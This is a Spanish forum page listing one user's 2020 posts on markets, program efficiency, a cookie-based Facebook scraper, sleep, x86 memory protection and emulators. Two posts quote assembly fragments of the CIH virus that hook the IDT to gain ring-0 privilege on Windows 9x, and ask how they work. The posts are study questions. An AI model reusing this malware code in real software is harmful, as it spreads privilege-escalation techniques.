elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado:


  Mostrar Temas
Páginas: [1] 2 3 4
1  Foros Generales / Foro Libre / Matematica de los mercados financieros. en: 25 Noviembre 2020, 15:30
Hola, estimados,

tengo una pregunta un poco curiosa. Echen un vistazo a la imagen:



Es evidentemente un mercado de valores, pero los mercados de valores no son mas que un numero que representa algo. No quiero entrar en definicion de que es lo que representa, sino solo en el hecho de que es un dato numerico.

Los datos numericos, son resultado de calculos numericos.
¿Alguien sabe como es este calculo exactamente?

Hoy se hace algoritmicamente, en el pasado se hacia manualmente... mi pregunta es la misma, ¿como se calcula el valor de un producto financiero? Cualquier informacion me seria util, incluso si es un rumor.

Si alguien sabe, ademas, en donde podria encontrar la historia del origen de estos mercados y su evolucion, estaria tambien agradecido.

FAQ (Frequent Answers to my Question, Respuestas Frecuentes a mi Pregunta):

- Es un mecanismo demasiado complejo para ser facilmente descrito: En la medida en que algo no se conoce en absoluto, se tiende a complicar en exceso.

- En el valor de tales mercados influyen tantos factores que explicarlo seria engorroso: Si no es molestia, ¿En donde encontraste tal informacion? ¿Conoces alguno de estos factores mas alla de suposciones de economistas?

- El valor es el resultado de la oferta y demanda: ¿Como entonces se mide la oferta y la demanda, y de que forma se relacionan exactamente para resultar en un valor especifico? y ¿Podrias describirlo en una ecuacion?

Muchisimas gracias por sus respuestas y saludos.


Tengo un par de teorias al respecto. Quien sea que crea tener argumentos para un debate me envia un mensaje privado.
2  Programación / Programación General / Eficiencia versus capacidad en: 20 Noviembre 2020, 17:15
Hola, tengo un pequeño dilema... ultimamente la mayoria de programas que hago se encargan de "gestionar" grandes cantidades de datos y me esta surgiendo un problema: el tiempo. No era problema cuando mis programas se tardaban de 5 a 10 segundos en procesar la informacion, pero ahora que ese numero ha llegado a de 30 a 45 minutos, comienza a preocuparme. Evidentemente las computadoras tienen un limite, no pretendo superarlo, solo planteare la forma en que funcionan mis programas, mis ideas, y espero sus opiniones sobre ellas y las suyas.

Bueno, para empezar, se que los datos de la RAM son considerablemente mas rapidamente accesibles que los datos en disco, eso no lo discuto... pero tomando en cuenta que se aplican mecanismos de memoria virtual cuando los datos son "bastantes" crei que acceder al disco "en porciones" seria mas ideal, para asi gestionar el swap memoria-disco yo mismo y adaptarlo a las necesidades de mi programa. Sin embargo comienzo a poner en duda la validez de mis metodos.

Por si alguien cree necesitar que sea mas especifico: el programa carga cierta cantidad de datos en un buffer peque¿o, hace algo con ellos, luego carga otra cantidad peque¿a, hasta que encuentra una coincidencia, la compara, la carga, carga una porcion mas grande, la procesa...

Mi pregunta, en resumen y siento ser engorroso, es: ¿que es mas eficiente, cargar 1 GB de datos en memoria RAM y procesarlos, tomando en cuenta que existe la memoria virtual, o acceder a un dato a la vez en el disco (digamos, buferes de 256 a 512 bytes)? Con eficiente quiero decir rapido, valoro cada segundo...

La respuesta puede ser obvia pero realmente no se en la practica que tanto afecte el rendimiento de la memoria RAM la memoria virtual.

Gracias y espero sus respuestas. Saludos!.
3  Programación / Programación General / Robot para Facebook. en: 24 Octubre 2020, 13:17
Hola,

me propuse hacer un robot que recopile algunos datos (podrian ser los nombres de mis amigos o los titulos de publicaciones que cumplan con criterios determinados...) de mi cuenta de Facebook, y me gustaria saber sus opiniones sobre el metodo que planeo utilizar, para hacerlo mas optimo o aprender algo nuevo en general o la forma en la que lo harian ustedes.

Pretendo que mi robot (el cual hare en C) se conecte a Facebook con la cookie de mi login, y acceda a por ejemplo, la pagina principal, cargue la pagina en HTML y rebusque en ella no se... "cosmos". cuando encuentre "cosmos", que descargue el texto de la descripcion y lo guarde en un archivo de texto o en una base de datos (que ya he programado).

Saludos y gracias de antemano por las sugerencias.
4  Foros Generales / Foro Libre / ¿que es realmente la irracionalidad? en: 1 Septiembre 2020, 23:52
¿Como es un comportamiento irracional?
¿Como distingues entre un comportamiento racional, y uno que no lo es?
¿Que es la irracionalidad en si?

¿Como estas?

Saludos.  ;D
5  Foros Generales / Foro Libre / Mal sueño y ejercicio fisico. en: 31 Agosto 2020, 20:53
Hola,

He buscado y rebuscado la respuesta por Internet y lo unico que encuentro es si es malo hacer ejercicio de noche. Mi pregunta es: ¿cual es la relacion entre el mal sueño y el ejercicio fisico?
Cuando duermo "muy mal" (menos de seis horas, cosa que se esta convirtiendo en algo un poco usual en mi vida, lo cual ha de tomarse en cuenta para responder mi pregunta) evito seguir mi rutina de una hora y quince minutos y la reduzco a cuarenta y cinco minutos o incluso treinta si me mareo (o tal vez me auto-sugestiono). En definitiva, ¿es malo hacer ejercicio mas o menos "intenso" diariamente tomando en cuenta un mal sueño paulatino -quiero decir, digamos, tres veces a la semana? ¿sigo reduciendo el tiempo con la misma intensidad cuando considere que he dormido mal, da igual, o es incluso mejor? ¿contrarresta de alguna forma el ejercicio los perjuicios del mal sueño?

Saludos y muchas gracias de antemano por la respuesta.
6  Sistemas Operativos / Windows / ¿como Windows detecta fallos de alineamiento? en: 24 Agosto 2020, 23:56
Como los accesos a memoria pueden ser de 8, 16 y 32 bits, y una direccion limite es especifica, podria establecerse, para un programa:

direccion base de su unica pagina (usando este modelo descriptivo de paginacion): 0
direccion limite: 0a

Si, por ejemplo, un programa accede, de esta forma, al byte que se encuentra en la direccion de memoria 0b:

Código
  1. mov al, [0b]

El sistema operativo pude indentificar que es un acceso a memoria ilegal. Sin embargo, ¿y en este caso?:

Código
  1. mov eax, [08]

Se esta accediendo a la direccion 0b, sin embargo, la direccion que se esta especificando es 08. Se que Windows detecta este acceso a memoria ilegal porque lo acabo de intentar, sin embargo, ¿alguien sabe como lo hace? se que nadie es ingeniero de Microsoft pero me pregunto si existe una aplicacion general en sistemas operativos y asi...

Saludos y gracias de antemano por la respuesta.
7  Sistemas Operativos / Windows / Acceso a memoria de otros procesos. en: 18 Agosto 2020, 18:29
Hola,
Segun entiendo, la memoria se divide en los segmentos que describe la GDT y en ellos los desplazamientos que se especifican en la PDE y respectivas PTEs pero si, por ejemplo, un proceso A tiene asignado el segmento 0001 en la GDT mapeado como datos/lectura-escritura, y un proceso B accede a la dirrecion 0001:0  con intencion de escribir, ¿que lo detiene, si el DPL del proceso B es el mismo cual del proceso A?, quiero decir, ¿como el sistema operativo detecta un acceso a memoria que no corresponde a su memoria, si es un acceso a memoria al fin y al cabo? ¿hace el sistema operativo pruebas en cada acceso a memoria?

Saludos.
8  Informática / Hardware / ¿Existe algun emu8086 para la arquitectura IA-32? en: 9 Agosto 2020, 17:01
Hola, me preguntaba si alguien conoce algun emulador parecido al conocido emu8086 de la arquitectura IA-32, ya que lo he estado buscando, sin embargo no encuentro mas que maquinas virtuales, cuando yo busco algo mas orientado a la depuracion y la versatilidad que ofrece esta herramienta.

Gracias de antemano y saludos.
9  Seguridad Informática / Análisis y Diseño de Malware / Instruccion SIDT y el virus CIH. en: 9 Agosto 2020, 14:32
Hola,
Tengo una duda un poco tonta que me esta rompiendo la cabeza... el virus CIH, para obtener privilegios del sistema, altera la IDT y modifica la entrada de una excepcion que luego ocasiona. Sin embargo, ¿no son, tanto las instrucciones SIDT y LIDT privilegiadas de antemano? es decir, ¿como el virus accede a la IDT cuando es un simple EXE en modo usuario?:

Citar
MyVirusStart:
push ebp

; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************

lea eax, [esp-04h*2]

xor ebx, ebx
xchg eax, fs:[ebx]

call @0
@0:
pop ebx

lea ecx, StopToRunVirusCode-@0[ebx]
push ecx

push eax

; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************

push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx;

add ebx, HookExceptionNumber*08h+04h ; ZF = 0

cli

mov ebp, [ebx] ;
mov bp, [ebx-04h] ; Entry Point

lea esi, MyExceptionHook-@1[ecx]

;...
10  Seguridad Informática / Análisis y Diseño de Malware / Obtencion de Ring 0 por parte del virus CIH en Windows 9x. en: 7 Agosto 2020, 12:25
Hola,
Hace poco descargue el codigo fuente del virus CIH para entenderlo, pues me parece interesante. Sin embargo me encontre con una parte de el que no entiendo muy bien, como era de esperarse...

Código
  1. ; *************************************
  2. ; * Let's Modify *
  3. ; * IDT(Interrupt Descriptor Table) *
  4. ; * to Get Ring0 Privilege... *
  5. ; *************************************
  6.  
  7. push eax ;
  8. sidt [esp-02h] ; Get IDT Base Address
  9. pop ebx ;
  10.  
  11. add ebx, HookExceptionNumber*08h+04h ; ZF = 0
  12.  
  13. cli
  14.  
  15. mov ebp, [ebx] ; Get Exception Base
  16. mov bp, [ebx-04h] ; Entry Point
  17.  
  18. lea esi, MyExceptionHook-@1[ecx]
  19.  
  20. push esi
  21.  
  22. mov [ebx-04h], si ;
  23. shr esi, 16 ; Modify Exception
  24. mov [ebx+02h], si ; Entry Point Address
  25.  
  26. pop esi

El comentario es bastante descriptivo. Sin duda suficiente para entender el objetivo, sin embargo el medio en si que utiliza en toda profundidad no lo entiendo plenamente:

Código
  1. push eax ;
  2. sidt [esp-02h] ; Get IDT Base Address
  3. pop ebx ;
Aparentemente esta metiendo a EAX en la pila para luego, en sidt [esp-02h], introducir la base de la IDT en EBX pero, ¿por que resta 2? ¿no deberia mas bien sumar 4? recordemos que los valores en la medida que son antiguos en la pila, se encuentran en posiciones de memoria mas altas y, en este caso, hablando de un registro de 4 bytes, precisamente 4 posiciones mas alto.

Código
  1. mov ebp, [ebx] ; Get Exception Base
  2. mov bp, [ebx-04h] ; Entry Point
Esto no es nada evidente para mi. ¿Mueve, aparentemente, el Entry Point del IDT HookExceptionNumber a ebp, y luego lo que sea que se encuentre 4 bytes antes del mismo en los 16 bits menos significativos de EBP? ¿que sentido tiene?

Código
  1. lea esi, MyExceptionHook-@1[ecx]
Ahora, mas evidentemente mueve el desplazamiento del hook a ESI. Sin embargo, ¿que es -@1[ecx]? ¿alguna forma de relocalizacion? No lo entiendo en absoluto. Aun no he aprendido esa sintaxis... ¿alguien tiene idea de al menos como se llama?

Código
  1. mov [ebx-04h], si ;
  2. shr esi, 16 ; Modify Exception
  3. mov [ebx+02h], si ; Entry Point Address
Mueve a esa misteriosa direccion (EBX-04) el desplazamiento antes mencionado... ¿alguien tiene idea de que hay en los anteriores 4 bytes a un IDT? (evidentemente otro IDT, pero la pregunta es ironica, quiero decir, ¿alguien sabe por que?)

Eso es todo... estoy un poco enredado.
Saludos.
Páginas: [1] 2 3 4
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines